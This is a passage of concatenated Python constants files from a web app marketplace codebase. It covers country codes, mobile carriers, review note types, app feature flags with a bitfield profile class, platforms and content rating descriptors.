('NIU', _lazy(u'Niue')),
('NFK', _lazy(u'Norfolk Island')),
('MNP', _lazy(u'Northern Mariana Islands')),
('NOR', _lazy(u'Norway')),
('OMN', _lazy(u'Oman')),
('PAK', _lazy(u'Pakistan')),
('PLW', _lazy(u'Palau')),
('PSE', _lazy(u'Palestinian Territory, Occupied')),
('PAN', _lazy(u'Panama')),
('PNG', _lazy(u'Papua New Guinea')),
('PRY', _lazy(u'Paraguay')),
('PER', _lazy(u'Peru')),
('PHL', _lazy(u'Philippines')),
('PCN', _lazy(u'Pitcairn')),
('POL', _lazy(u'Poland')),
('PRT', _lazy(u'Portugal')),
('PRI', _lazy(u'Puerto Rico')),
('QAT', _lazy(u'Qatar')),
('REU', _lazy(u'Réunion')),
('ROU', _lazy(u'Romania')),
('RUS', _lazy(u'Russian Federation')),
('RWA', _lazy(u'Rwanda')),
('BLM', _lazy(u'Saint Barthélemy')),
('SHN', _lazy(u'Saint Helena')),
('KNA', _lazy(u'Saint Kitts and Nevis')),
('LCA', _lazy(u'Saint Lucia')),
('MAF', _lazy(u'Saint Martin')),
('SPM', _lazy(u'Saint Pierre and Miquelon')),
('VCT', _lazy(u'Saint Vincent and the Grenadines')),
('WSM', _lazy(u'Samoa')),
('SMR', _lazy(u'San Marino')),
('STP', _lazy(u'Sao Tome and Principe')),
('SAU', _lazy(u'Saudi Arabia')),
('SEN', _lazy(u'Senega')),
('SRB', _lazy(u'Serbia')),
('SCG', _lazy(u'Serbia and Montenegro')),
('SYC', _lazy(u'Seychelles')),
('SLE', _lazy(u'Sierra Leone')),
('SGP', _lazy(u'Singapore')),
('SXM', _lazy(u'Sint Maarten (Dutch part)')),
('SVK', _lazy(u'Slovakia')),
('SVN', _lazy(u'Slovenia')),
('SLB', _lazy(u'Solomon Islands')),
('SOM', _lazy(u'Somalia')),
('ZAF', _lazy(u'South Africa')),
('SGS', _lazy(u'South Georgia and the South Sandwich Islands')),
('SSD', _lazy(u'South Sudan')),
('ESP', _lazy(u'Spain')),
('LKA', _lazy(u'Sri Lanka')),
('SDN', _lazy(u'Sudan')),
('SUR', _lazy(u'Suriname')),
('SJM', _lazy(u'Svalbard and Jan Mayen')),
('SWZ', _lazy(u'Swaziland')),
('SWE', _lazy(u'Sweden')),
('CHE', _lazy(u'Switzerland')),
('SYR', _lazy(u'Syrian Arab Republic')),
('TWN', _lazy(u'Taiwan, Province of China')),
('TJK', _lazy(u'Tajikistan')),
('TZA', _lazy(u'Tanzania, United Republic of')),
('THA', _lazy(u'Thailand')),
('TLS', _lazy(u'Timor-Leste')),
('TGO', _lazy(u'Togo')),
('TKL', _lazy(u'Tokelau')),
('TON', _lazy(u'Tonga')),
('TTO', _lazy(u'Trinidad and Tobago')),
('TUN', _lazy(u'Tunisia')),
('TUR', _lazy(u'Turkey')),
('TKM', _lazy(u'Turkmenistan')),
('TCA', _lazy(u'Turks and Caicos Islands')),
('TUV', _lazy(u'Tuvalu')),
('UGA', _lazy(u'Uganda')),
('UKR', _lazy(u'Ukraine')),
('ARE', _lazy(u'United Arab Emirates')),
('GBR', _lazy(u'United Kingdom')),
('USA', _lazy(u'United States')),
('UMI', _lazy(u'United States Minor Outlying Islands')),
('URY', _lazy(u'Uruguay')),
('UZB', _lazy(u'Uzbekistan')),
('VUT', _lazy(u'Vanuatu')),
('VEN', _lazy(u'Venezuela, Bolivarian Republic of')),
('VNM', _lazy(u'Viet Nam')),
('VGB', _lazy(u'Virgin Islands, British')),
('VIR', _lazy(u'Virgin Islands, U.S.')),
('WLF', _lazy(u'Wallis and Futuna')),
('ESH', _lazy(u'Western Sahara')),
('YEM', _lazy(u'Yemen')),
('ZMB', _lazy(u'Zambia')),
('ZWE', _lazy(u'Zimbabwe')),
]
########NEW FILE########
__FILENAME__ = carriers
# -*- coding: utf-8 -*-
class CARRIER(object):
pass
class UNKNOWN_CARRIER(CARRIER):
# Used as a dummy.
id = 0
name = ''
slug = 'carrierless'
class TELEFONICA(CARRIER):
id = 1
name = u'Telefónica'
slug = 'telefonica'
class AMERICA_MOVIL(CARRIER):
id = 2
name = u'América Móvil'
slug = 'america_movil'
class CHINA_UNICOM(CARRIER):
id = 3
name = u'China Unicom'
slug = 'china_unicom'
class DEUTSCHE_TELEKOM(CARRIER):
id = 4
name = u'Deutsche Telekom'
slug = 'deutsche_telekom'
class ETISALAT(CARRIER):
id = 5
name = u'Etisalat'
slug = 'etisalat'
class HUTCHINSON_THREE_GROUP(CARRIER):
id = 6
name = u'Hutchinson Three Group'
slug = 'hutchinson_three_group'
class KDDI(CARRIER):
id = 7
name = u'KDDI'
slug = 'kddi'
class KT(CARRIER):
id = 8
name = u'KT'
slug = 'kt'
class MEGAFON(CARRIER):
id = 9
name = u'MegaFon'
slug = 'megafon'
class QTEL(CARRIER):
id = 10
name = u'Qtel'
slug = 'qtel'
class SINGTEL(CARRIER):
id = 11
name = u'SingTel'
slug = 'singtel'
class SMART(CARRIER):
id = 12
name = u'Smart'
slug = 'smart'
class SPRINT(CARRIER):
id = 13
name = u'Sprint'
slug = 'sprint'
class TELECOM_ITALIA_GROUP(CARRIER):
id = 14
name = u'Telecom Italia Group'
slug = 'telecom_italia_group'
class TELENOR(CARRIER):
id = 15
name = u'Telenor'
slug = 'telenor'
class TMN(CARRIER):
id = 16
name = u'TMN'
slug = 'tmn'
class VIMPELCOM(CARRIER):
id = 17
name = u'VimpelCom'
slug = 'vimpelcom'
CARRIER_MAP = dict((c.slug, c) for name, c in locals().items() if
type(c) is type and c != CARRIER and issubclass(c, CARRIER))
CARRIERS = CARRIER_MAP.values()
CARRIER_IDS = frozenset([c.id for c in CARRIERS])
CARRIER_SLUGS = frozenset([c.slug for c in CARRIERS])
CARRIER_CHOICES = [(c.id, c) for c in CARRIERS]
########NEW FILE########
__FILENAME__ = comm
from tower import ugettext_lazy as _
# Number of days a token is valid for.
THREAD_TOKEN_EXPIRY = 30
# Number of times a token can be used.
MAX_TOKEN_USE_COUNT = 5
MAX_ATTACH = 10
NO_ACTION = 0
APPROVAL = 1
REJECTION = 2
DISABLED = 3
MORE_INFO_REQUIRED = 4
ESCALATION = 5
REVIEWER_COMMENT = 6
RESUBMISSION = 7
APPROVE_VERSION_WAITING = 8
ESCALATION_HIGH_ABUSE = 9
ESCALATION_HIGH_REFUNDS = 10
ESCALATION_CLEARED = 11
REREVIEW_CLEARED = 12
NOTE_TYPES = {
NO_ACTION: _('No action'),
APPROVAL: _('Approved'),
REJECTION: _('Rejected'),
DISABLED: _('Disabled'),
MORE_INFO_REQUIRED: _('More information requested'),
ESCALATION: _('Escalated'),
REVIEWER_COMMENT: _('Comment'),
RESUBMISSION: _('App resubmission'),
APPROVE_VERSION_WAITING: _('Approved but waiting to be made public'),
ESCALATION_CLEARED: _('Escalation cleared'),
ESCALATION_HIGH_ABUSE: _('Escalated due to High Abuse Reports'),
ESCALATION_HIGH_REFUNDS: _('Escalated due to High Refund Requests'),
REREVIEW_CLEARED: _('Re-review cleared')
}
# Note types only visible by reviewers and not developers.
REVIEWER_NOTE_TYPES = (
ESCALATION,
REVIEWER_COMMENT,
ESCALATION_HIGH_ABUSE,
ESCALATION_HIGH_REFUNDS,
ESCALATION_CLEARED
)
# Prefix of the reply to address in comm emails.
REPLY_TO_PREFIX = 'commreply+'
def U_NOTE_TYPES():
return dict((key, unicode(value)) for (key, value) in
NOTE_TYPES.iteritems())
def ACTION_MAP(activity_action):
"""Maps ActivityLog action ids to Commbadge note types."""
import amo
return {
amo.LOG.APPROVE_VERSION.id: APPROVAL,
amo.LOG.APPROVE_VERSION_WAITING.id: APPROVAL,
amo.LOG.APP_DISABLED.id: DISABLED,
amo.LOG.ESCALATE_MANUAL.id: ESCALATION,
amo.LOG.ESCALATE_VERSION.id: ESCALATION,
amo.LOG.ESCALATION_VIP_APP.id: ESCALATION,
amo.LOG.ESCALATED_HIGH_ABUSE.id: ESCALATION_HIGH_ABUSE,
amo.LOG.ESCALATED_HIGH_REFUNDS.id: ESCALATION_HIGH_REFUNDS,
amo.LOG.ESCALATION_CLEARED.id: ESCALATION_CLEARED,
amo.LOG.REQUEST_INFORMATION.id: MORE_INFO_REQUIRED,
amo.LOG.REJECT_VERSION.id: REJECTION,
amo.LOG.REREVIEW_CLEARED.id: REREVIEW_CLEARED,
amo.LOG.WEBAPP_RESUBMIT.id: RESUBMISSION,
amo.LOG.COMMENT_VERSION.id: REVIEWER_COMMENT,
}.get(activity_action, NO_ACTION)
########NEW FILE########
__FILENAME__ = features
from ordereddict import OrderedDict
from django.conf import settings
from tower import ugettext_lazy as _lazy
# WARNING: When adding a new app feature here also include a migration.
#
# WARNING: Order matters here. Don't re-order these or alphabetize them. If you
# add new ones put them on the end.
#
# These are used to dynamically generate the field list for the AppFeatures
# django model in mkt.webapps.models.
APP_FEATURES = OrderedDict([
('APPS', {
'name': _lazy(u'App Management API'),
'description': _lazy(u'The app requires the `navigator.mozApps` API '
u'to install and manage other apps.'),
'apis': ('navigator.mozApps',),
}),
('PACKAGED_APPS', {
'name': _lazy(u'Packaged Apps Install API'),
'description': _lazy(
u'The app requires the `navigator.mozApps.installPackage` API '
u'to install other packaged apps.'),
'apis': ('navigator.mozApps.installPackage',),
}),
('PAY', {
'name': _lazy(u'Web Payment'),
'description': _lazy(u'The app requires the `navigator.mozApps` API.'),
'apis': ('navigator.pay', 'navigator.mozPay',),
}),
('ACTIVITY', {
'name': _lazy(u'Web Activities'),
'description': _lazy(u'The app requires Web Activities '
u'(the `MozActivity` API).'),
'apis': ('MozActivity',),
}),
('LIGHT_EVENTS', {
'name': _lazy(u'Ambient Light Sensor'),
'description': _lazy(u'The app requires an ambient light sensor '
u'(the `ondevicelight` API).'),
'apis': ('window.ondevicelight',),
}),
('ARCHIVE', {
'name': _lazy(u'Archive'),
'description': u'',
'apis': (),
}),
('BATTERY', {
'name': _lazy(u'Battery'),
'description': _lazy(u'The app requires the `navigator.battery` API.'),
'apis': ('navigator.battery',),
}),
('BLUETOOTH', {
'name': u'Bluetooth',
'description': _lazy(u'The app requires the `navigator.mozBluetooth` '
u'API.'),
'apis': ('navigator.bluetooth', 'navigator.mozBluetooth'),
}),
('CONTACTS', {
'name': _lazy(u'Contacts'),
'description': _lazy(u'The app requires the `navigator.mozContacts` '
u'API.'),
'apis': ('navigator.contacts', 'navigator.mozContacts'),
}),
('DEVICE_STORAGE', {
'name': _lazy(u'Device Storage'),
'description': _lazy(u'The app requires the Device Storage API to '
u'access files on the filesystem.'),
'apis': ('navigator.getDeviceStorage',),
}),
('INDEXEDDB', {
'name': u'IndexedDB',
'description': _lazy(u'The app requires the platform to support '
u'IndexedDB.'),
'apis': ('navigator.indexedDB', 'navigator.mozIndexedDB'),
}),
('GEOLOCATION', {
'name': _lazy(u'Geolocation'),
'description': _lazy(u'The app requires the platform to support the '
u'`navigator.geolocation` API.'),
'apis': ('navigator.geolocation',),
}),
('IDLE', {
'name': _lazy(u'Idle'),
'description': u'',
'apis': ('addIdleObserver', 'removeIdleObserver'),
}),
('NETWORK_INFO', {
'name': _lazy(u'Network Information'),
'description': _lazy(u'The app requires the ability to get '
u'information about the network connection (the '
u'`navigator.mozConnection` API).'),
'apis': ('navigator.mozConnection', 'navigator.mozMobileConnection'),
}),
('NETWORK_STATS', {
'name': _lazy(u'Network Stats'),
'description': _lazy(u'The app requires the '
u'`navigator.mozNetworkStats` API.'),
'apis': ('navigator.networkStats', 'navigator.mozNetworkStats'),
}),
('PROXIMITY', {
'name': _lazy(u'Proximity'),
'description': _lazy(u'The app requires a proximity sensor (the '
u'`ondeviceproximity` API).'),
'apis': ('navigator.ondeviceproximity',),
}),
('PUSH', {
'name': _lazy(u'Simple Push'),
'description': _lazy(u'The app requires the `navigator.mozPush` API.'),
'apis': ('navigator.push', 'navigator.mozPush'),
}),
('ORIENTATION', {
'name': _lazy(u'Screen Orientation'),
'description': _lazy(u'The app requires the platform to support the '
u'`ondeviceorientation` API.'),
'apis': ('ondeviceorientation',),
}),
('TIME_CLOCK', {
'name': _lazy(u'Time/Clock'),
'description': _lazy(u'The app requires the `navigator.mozTime` API.'),
'apis': ('navigator.time', 'navigator.mozTime'),
}),
('VIBRATE', {
'name': _lazy(u'Vibration'),
'description': _lazy(u'The app requires the device to support '
u'vibration (the `navigator.vibrate` API).'),
'apis': ('navigator.vibrate',),
}),
('FM', {
'name': u'WebFM',
'description': _lazy(u'The app requires the `navigator.mozFM` or '
u'`navigator.mozFMRadio` APIs.'),
'apis': ('navigator.mozFM', 'navigator.mozFMRadio'),
}),
('SMS', {
'name': u'WebSMS',
'description': _lazy(u'The app requires the `navigator.mozSms` API.'),
'apis': ('navigator.mozSms', 'navigator.mozSMS'),
}),
('TOUCH', {
'name': _lazy(u'Touch'),
'description': _lazy(u'The app requires the platform to support touch '
u'events. This option indicates that the app '
u'will not function when used with a mouse.'),
'apis': ('window.ontouchstart',),
}),
('QHD', {
'name': _lazy(u'Smartphone-Sized Displays (qHD)'),
'description': _lazy(u'The app requires the platform to have a '
u'smartphone-sized display (having qHD '
u'resolution). This option indicates that the '
u'app will be unusable on larger displays '
u'(e.g., tablets, desktop, large or high-DPI '
u'phones).'),
'apis': (),
}),
('MP3', {
'name': u'MP3',
'description': _lazy(u'The app requires that the platform can decode '
u'and play MP3 files.'),
'apis': (),
}),
('AUDIO', {
'name': _lazy(u'Audio'),
'description': _lazy(u'The app requires that the platform supports '
u'the HTML5 audio API.'),
'apis': ('Audio',),
}),
('WEBAUDIO', {
'name': _lazy(u'Web Audio'),
'description': _lazy(u'The app requires that the platform supports '
u'the Web Audio API (`window.AudioContext`).'),
'apis': ('AudioContext', 'mozAudioContext', 'webkitAudioContext'),
}),
('VIDEO_H264', {
'name': u'H.264',
'description': _lazy(u'The app requires that the platform can decode '
u'and play H.264 video files.'),
'apis': (),
}),
('VIDEO_WEBM', {
'name': u'WebM',
'description': _lazy(u'The app requires that the platform can decode '
u'and play WebM video files (VP8).'),
'apis': (),
}),
('FULLSCREEN', {
'name': _lazy(u'Full Screen'),
'description': _lazy(u'The app requires the Full Screen API '
u'(`requestFullScreen` or '
u'`mozRequestFullScreen`).'),
'apis': ('document.documentElement.requestFullScreen',),
}),
('GAMEPAD', {
'name': _lazy(u'Gamepad'),
'description': _lazy(u'The app requires the platform to support the '
u'gamepad API (`navigator.getGamepads`).'),
'apis': ('navigator.getGamepad', 'navigator.mozGetGamepad'),
}),
('QUOTA', {
'name': _lazy(u'Quota Management'),
'description': _lazy(u'The app requires the platform to allow '
u'persistent storage limit increases above the '
u'normally allowed limits for an app '
u'(`window.StorageInfo` or '
u'`window.persistentStorage`).'),
'apis': ('navigator.persistentStorage', 'navigator.temporaryStorage'),
}),
('CAMERA', {
'name': _lazy(u'Camera'),
'description': _lazy(u'The app requires the platform to allow access '
u'to video from the device camera via a '
u'LocalMediaStream object.'),
'apis': ('navigator.getUserMedia({video: true, picture: true})',),
}),
('MIC', {
'name': _lazy(u'Microphone'),
'description': _lazy(u'The app requires the platform to allow access '
u'to audio from the device microphone.'),
'apis': ('navigator.getUserMedia({audio: true})',),
}),
('SCREEN_CAPTURE', {
'name': _lazy(u'Screen Capture'),
'description': _lazy(u'The app requires the platform to allow access '
u'to the device screen for capture.'),
'apis': ('navigator.getUserMedia({video: {mandatory: '
'{chromeMediaSource: "screen"}}})',),
}),
('WEBRTC_MEDIA', {
'name': _lazy(u'WebRTC MediaStream'),
'description': _lazy(u'The app requires the platform to allow web '
u'real-time communication browser-to-browser '
u'inbound media streams.'),
'apis': ('MediaStream',),
}),
('WEBRTC_DATA', {
'name': _lazy(u'WebRTC DataChannel'),
'description': _lazy(u'The app requires the platform to allow '
u'peer-to-peer exchange of data other than audio '
u'and video.'),
'apis': ('DataChannel',),
}),
('WEBRTC_PEER', {
'name': _lazy(u'WebRTC PeerConnection'),
'description': _lazy(u'The app requires the platform to allow '
u'communication of streaming data between '
u'peers.'),
'apis': ('RTCPeerConnection',),
}),
('SPEECH_SYN', {
'name': _lazy(u'Web Speech Synthesis'),
'description': _lazy(u'The app requires the platform to allow the use '
u'of text-to-speech.'),
'apis': ('SpeechSynthesis',)
}),
('SPEECH_REC', {
'name': _lazy(u'Web Speech Recognition'),
'description': _lazy(u'The app requires the platform to allow '
u'the use of speech-to-text.'),
'apis': ('SpeechRecognition',)
}),
('POINTER_LOCK', {
'name': _lazy(u'Pointer Lock'),
'description': _lazy(u'The app requires the platform to provide '
u'additional information and control about the '
u'pointer.'),
'apis': ('document.documentElement.requestPointerLock',)
}),
('NOTIFICATION', {
'name': _lazy(u'Notifications'),
'description': _lazy(u'The app requires the platform to allow the '
u'displaying phone and desktop notifications to '
u'the user.'),
'apis': ('Notification', 'navigator.mozNotification')
}),
('ALARM', {
'name': _lazy(u'Alarms'),
'description': _lazy(u'The app requires the platform to provide '
u'access to the device alarm settings to '
u'schedule notifications and events at specific '
u'time.'),
'apis': ('navigator.mozAlarms',)
}),
('SYSTEMXHR', {
'name': _lazy(u'SystemXHR'),
'description': _lazy(u'The app requires the platform to allow the '
u'sending of asynchronous HTTP requests without '
u'the restrictions of the same-origin policy.'),
'apis': ('XMLHttpRequest({mozSystem: true})',)
}),
('TCPSOCKET', {
'name': _lazy(u'TCP Sockets'),
'description': _lazy(u'The app requires the platform to allow opening '
u'raw TCP sockets.'),
'apis': ('TCPSocket', 'navigator.mozTCPSocket',
'navigator.mozTCPServerSocket')
}),
('THIRDPARTY_KEYBOARD_SUPPORT', {
'name': _lazy(u'Third-Party Keyboard Support'),
'description': _lazy(u'The app requires the platform to support '
u'third-party keyboards.'),
'apis': ('navigator.mozInputMethod',),
}),
('NETWORK_INFO_MULTIPLE', {
'name': _lazy(u'Multiple Network Information'),
'description': _lazy(u'The app requires the ability to get '
u'information about multiple network '
u'connections.'),
'apis': ('navigator.mozMobileConnections',),
}),
])
class FeatureProfile(OrderedDict):
"""
Convenience class for performing conversion operations on feature profile
representations.
"""
def __init__(self, **kwargs):
"""
Creates a FeatureProfile object.
Takes kwargs to the features to enable or disable. Features not
specified but that are in APP_FEATURES will be False by default.
E.g.:
>>> FeatureProfile(sms=True).to_signature()
'400.32.1'
"""
super(FeatureProfile, self).__init__()
for af in APP_FEATURES:
key = af.lower()
self[key] = kwargs.get(key, False)
@classmethod
def from_int(cls, features):
"""
Construct a FeatureProfile object from a integer bitfield.
>>> FeatureProfile.from_int(0x42)
FeatureProfile([('apps', False), ('packaged_apps', True), ...)
"""
instance = cls()
for i, k in enumerate(reversed(APP_FEATURES)):
instance[k.lower()] = bool(features & 1 << i)
return instance
@classmethod
def from_signature(cls, signature):
"""
Construct a FeatureProfile object from a decimal signature.
>>> FeatureProfile.from_signature('40000000.32.1')
FeatureProfile([('apps', False), ('packaged_apps', True), ...)
"""
dehexed = int(signature.split('.')[0], 16)
return cls.from_int(dehexed)
def to_int(self):
"""
Convert a FeatureProfile object to an integer bitfield.
>>> profile.to_int()
66
"""
features = 0
for i, v in enumerate(reversed(self.values())):
features |= bool(v) << i
return features
def to_signature(self):
"""
Convert a FeatureProfile object to its decimal signature.
>>> profile.to_signature()
'40000000.32.1'
"""
return '%x.%s.%s' % (self.to_int(), len(self),
settings.APP_FEATURES_VERSION)
def to_list(self):
"""
Returns a list representing the true values of this profile.
"""
return [k for k, v in self.iteritems() if v]
def to_kwargs(self, prefix=''):
"""
Returns a dict representing the false values of this profile.
Parameters:
- `prefix` - a string prepended to the key name. Helpful if being used
to traverse relations
This only includes keys for which the profile is False, which is useful
for querying apps where we want to filter by apps which do not require
a feature.
>>> profile = FeatureProject.from_signature(request.get('pro'))
>>> Webapp.objects.filter(**profile.to_kwargs())
"""
return dict((prefix + k, False) for k, v in self.iteritems() if not v)
########NEW FILE########
__FILENAME__ = feed
from tower import ugettext_lazy as _lazy
FEEDAPP_TYPE_ICON = 'icon'
FEEDAPP_TYPE_IMAGE = 'image'
FEEDAPP_TYPE_DESC = 'description'
FEEDAPP_TYPE_QUOTE = 'quote'
FEEDAPP_TYPE_PREVIEW = 'preview'
FEEDAPP_TYPES = (
(FEEDAPP_TYPE_ICON, _lazy(u'Icon')),
(FEEDAPP_TYPE_IMAGE, _lazy(u'Header Graphic')),
(FEEDAPP_TYPE_DESC, _lazy(u'Description')),
(FEEDAPP_TYPE_QUOTE, _lazy(u'Quote')),
(FEEDAPP_TYPE_PREVIEW, _lazy(u'Screenshot')),
)
########NEW FILE########
__FILENAME__ = lookup
MAX_RESULTS = 200
SEARCH_LIMIT = 20
########NEW FILE########
__FILENAME__ = payments
from tower import ugettext as _
PENDING = 'PENDING'
COMPLETED = 'OK'
FAILED = 'FAILED'
REFUND_STATUSES = {
PENDING: _('Pending'),
COMPLETED: _('Completed'),
FAILED: _('Failed'),
}
# SellerProduct access types.
ACCESS_PURCHASE = 1
ACCESS_SIMULATE = 2
PAYMENT_STATUSES = {
1: 'passed',
2: 'failed'
}
########NEW FILE########
__FILENAME__ = platforms
import re
from tower import ugettext_lazy as _
from versions.compare import version_int as vint
# These are the minimum versions required for `navigator.mozApps` support.
APP_PLATFORMS = [
# Firefox for Desktop.
(
[
re.compile('Firefox/([\d.]+)')
],
vint('16.0')
),
# Firefox for Android.
(
[
re.compile('Fennec/([\d.]+)'),
re.compile('Android; Mobile; rv:([\d.]+)'),
re.compile('Mobile; rv:([\d.]+)')
],
vint('17.0')
)
]
def FREE_PLATFORMS(request=None, is_packaged=False):
import waffle
platforms = (
('free-firefoxos', _('Firefox OS')),
)
android_packaged_enabled = (request and
waffle.flag_is_active(request, 'android-packaged'))
desktop_packaged_enabled = (request and
waffle.flag_is_active(request, 'desktop-packaged'))
if not is_packaged or (is_packaged and desktop_packaged_enabled):
platforms += (
('free-desktop', _('Firefox for Desktop')),
)
if not is_packaged or (is_packaged and android_packaged_enabled):
platforms += (
('free-android-mobile', _('Firefox Mobile')),
('free-android-tablet', _('Firefox Tablet')),
)
return platforms
def PAID_PLATFORMS(request=None, is_packaged=False):
import waffle
platforms = (
('paid-firefoxos', _('Firefox OS')),
)
android_payments_enabled = (request and
waffle.flag_is_active(request, 'android-payments'))
android_packaged_enabled = (request and
waffle.flag_is_active(request, 'android-packaged'))
if android_payments_enabled :
if not is_packaged or (is_packaged and android_packaged_enabled):
platforms += (
('paid-android-mobile', _('Firefox Mobile')),
('paid-android-tablet', _('Firefox Tablet')),
)
return platforms
# Extra information about those values for display in the page.
DEVICE_LOOKUP = {
'free-firefoxos': _('Fully open mobile ecosystem'),
'free-desktop': _('Windows, Mac and Linux'),
'free-android-mobile': _('Android smartphones'),
'free-android-tablet': _('Tablets'),
'paid-firefoxos': _('Fully open mobile ecosystem'),
'paid-android-mobile': _('Android smartphones'),
'paid-android-tablet': _('Tablets'),
}
########NEW FILE########
__FILENAME__ = ratingdescriptors
from tower import ugettext_lazy as _lazy
# WARNING: When adding a new rating descriptor here also include a migration.
# All descriptor keys must be prefixed by the rating body (e.g. USK_).
#
# These are used to dynamically generate the field list for the
# RatingDescriptors Django model in mkt.webapps.models.
RATING_DESCS = {
'CLASSIND_CRIMINAL_ACTS': {'name': _lazy('Criminal Acts')},
'CLASSIND_DRUGS': {'name': _lazy('Drugs')},
'CLASSIND_DRUGS_ILLEGAL': {'name': _lazy('Illegal Drugs')},
'CLASSIND_DRUGS_LEGAL': {'name': _lazy('Legal Drugs')},
# L10n: `Language` as in foul language.
'CLASSIND_LANG': {'name': _lazy('Inappropriate Language')},
'CLASSIND_NUDITY': {'name': _lazy('Nudity')},
# L10n: `Sex` as in sexual, not as in gender.
'CLASSIND_SEX': {'name': _lazy('Sex')},
'CLASSIND_SEX_CONTENT': {'name': _lazy('Sexual Content')},
'CLASSIND_SEX_EXPLICIT': {'name': _lazy('Explicit Sex')},
'CLASSIND_SHOCKING': {'name': _lazy('Impacting Content')},
'CLASSIND_VIOLENCE': {'name': _lazy('Violence')},
'CLASSIND_VIOLENCE_EXTREME': {'name': _lazy('Extreme Violence')},
'ESRB_ALCOHOL_REF': {'name': _lazy('Alcohol Reference')},
'ESRB_ALCOHOL_TOBACCO_REF': {'name': _lazy('Alcohol and Tobacco Reference')},
'ESRB_ALCOHOL_TOBACCO_USE': {'name': _lazy('Use of Alcohol and Tobacco')},
'ESRB_ALCOHOL_USE': {'name': _lazy('Use of Alcohol')},
'ESRB_BLOOD': {'name': _lazy('Blood')},
'ESRB_BLOOD_GORE': {'name': _lazy('Blood and Gore')},
'ESRB_COMIC_MISCHIEF': {'name': _lazy('Comic Mischief')},
'ESRB_CRIME': {'name': _lazy('Crime')},
'ESRB_CRIME_INSTRUCT': {'name': _lazy('Criminal Instruction')},
'ESRB_CRUDE_HUMOR': {'name': _lazy('Crude Humor')},
'ESRB_DRUG_ALCOHOL_REF': {'name': _lazy('Drug and Alcohol Reference')},
'ESRB_DRUG_ALCOHOL_TOBACCO_REF': {'name': _lazy('Drug, Alcohol, and Tobacco Reference')},
'ESRB_DRUG_ALCOHOL_TOBACCO_USE': {'name': _lazy('Use of Drug, Alcohol, and Tobacco')},
'ESRB_DRUG_ALCOHOL_USE': {'name': _lazy('Use of Drug and Alcohol')},
'ESRB_DRUG_REF': {'name': _lazy('Drug Reference')},
'ESRB_DRUG_TOBACCO_REF': {'name': _lazy('Drug and Tobacco Reference')},
'ESRB_DRUG_TOBACCO_USE': {'name': _lazy('Use of Drug and Tobacco')},
'ESRB_DRUG_USE': {'name': _lazy('Use of Drugs')},
'ESRB_FANTASY_VIOLENCE': {'name': _lazy('Fantasy Violence')},
'ESRB_HATE_SPEECH': {'name': _lazy('Hate Speech')},
'ESRB_INTENSE_VIOLENCE': {'name': _lazy('Intense Violence')},
# L10n: `Language` as in foul language.
'ESRB_LANG': {'name': _lazy('Language')},
'ESRB_MILD_BLOOD': {'name': _lazy('Mild Blood')},
'ESRB_MILD_FANTASY_VIOLENCE': {'name': _lazy('Mild Fantasy Violence')},
'ESRB_MILD_LANG': {'name': _lazy('Mild Language')},
'ESRB_MILD_VIOLENCE': {'name': _lazy('Mild Violence')},
'ESRB_NUDITY': {'name': _lazy('Nudity')},
'ESRB_PARTIAL_NUDITY': {'name': _lazy('Partial Nudity')},
'ESRB_REAL_GAMBLING': {'name': _lazy('Real Gambling')},
'ESRB_SCARY': {'name': _lazy('Scary Themes')},
'ESRB_SEX_CONTENT': {'name': _lazy('Sexual Content')},
'ESRB_SEX_THEMES': {'name': _lazy('Sexual Themes')},
'ESRB_SIM_GAMBLING': {'name': _lazy('Simulated Gambling')},
'ESRB_STRONG_LANG': {'name': _lazy('Strong Language')},
'ESRB_STRONG_SEX_CONTENT': {'name': _lazy('Strong Sexual Content')},
'ESRB_SUGGESTIVE': {'name': _lazy('Suggestive Themes')},
'ESRB_TOBACCO_REF': {'name': _lazy('Tobacco Reference')},
'ESRB_TOBACCO_USE': {'name': _lazy('Use of Tobacco')},
'ESRB_VIOLENCE': {'name': _lazy('Violence')},
'ESRB_VIOLENCE_REF': {'name': _lazy('Violence References')},
'GENERIC_DISCRIMINATION': {'name': _lazy('Discrimination')},
'GENERIC_DRUGS': {'name': _lazy('Drugs')},
'GENERIC_GAMBLING': {'name': _lazy('Gambling')},
# L10n: `Language` as in foul language.
'GENERIC_LANG': {'name': _lazy('Language')},
'GENERIC_ONLINE': {'name': _lazy('Online')},
'GENERIC_SCARY': {'name': _lazy('Fear')},
# L10n: `Sex` as in sexual, not as in gender.
'GENERIC_SEX_CONTENT': {'name': _lazy('Sex')},
'GENERIC_VIOLENCE': {'name': _lazy('Violence')},
'PEGI_DISCRIMINATION': {'name': _lazy('Discrimination')},
'PEGI_DRUGS': {'name': _lazy('Drugs')},
'PEGI_GAMBLING': {'name': _lazy('Gambling')},
# L10n: `Language` as in foul language.
'PEGI_LANG': {'name': _lazy('Language')},
'PEGI_ONLINE': {'name': _lazy('Online')},
'PEGI_SCARY': {'name': _lazy('Fear')},
# L10n: `Sex` as in sexual, not as in gender.
'PEGI_SEX_CONTENT': {'name': _lazy('Sex')},
'PEGI_VIOLENCE': {'name': _lazy('Violence')},
# PEGI's version of interactive elements.
'PEGI_USERS_INTERACT': {'name': _lazy('Social Interaction Functionality')},
'PEGI_SHARES_INFO': {'name': _lazy('Personal Data Sharing')},
'PEGI_DIGITAL_PURCHASES': {'name': _lazy('In-app Purchase Option')},
'PEGI_SHARES_LOCATION': {'name': _lazy('Location Data Sharing')},
'USK_DISCRIMINATION': {'name': _lazy('Discrimination')},
'USK_DRUGS': {'name': _lazy('Drugs')},
# L10n: `Language` as in foul language.
'USK_LANG': {'name': _lazy('Explicit Language')},
'USK_SCARY': {'name': _lazy('Frightening Content')},
'USK_SEX_CONTENT': {'name': _lazy('Sexual Content')},
'USK_VIOLENCE': {'name': _lazy('Violence')},
# New USK.
'USK_ABSTRACT_VIOLENCE': {'name': _lazy('Abstract Violence')},
'USK_ALCOHOL': {'name': _lazy('Alcohol Use')},
'USK_DRUG_USE': {'name': _lazy('Drug Use')},
'USK_EXPLICIT_VIOLENCE': {'name': _lazy('Explicit Violence')},
'USK_HORROR': {'name': _lazy('Horror')},
'USK_NUDITY': {'name': _lazy('Nudity')},
'USK_SEX_VIOLENCE': {'name': _lazy('Sexual Violence')},
'USK_SEX_VIOLENCE_REF': {'name': _lazy('Sexual Violence Reference')},
'USK_SEX_REF': {'name': _lazy('Sexual References')},
'USK_SOME_SCARES': {'name': _lazy('Rare Scares')},
'USK_SOME_SWEARING': {'name': _lazy('Occasional Swearing')},
'USK_TOBACCO': {'name': _lazy('Tobacco Use')},
}
########NEW FILE########
__FILENAME__ = ratinginteractives
from ordereddict import OrderedDict
from tower import ugettext_lazy as _lazy
# WARNING: When adding a new interactive element here also include a migration.
#
# These are used to dynamically generate the field list for the
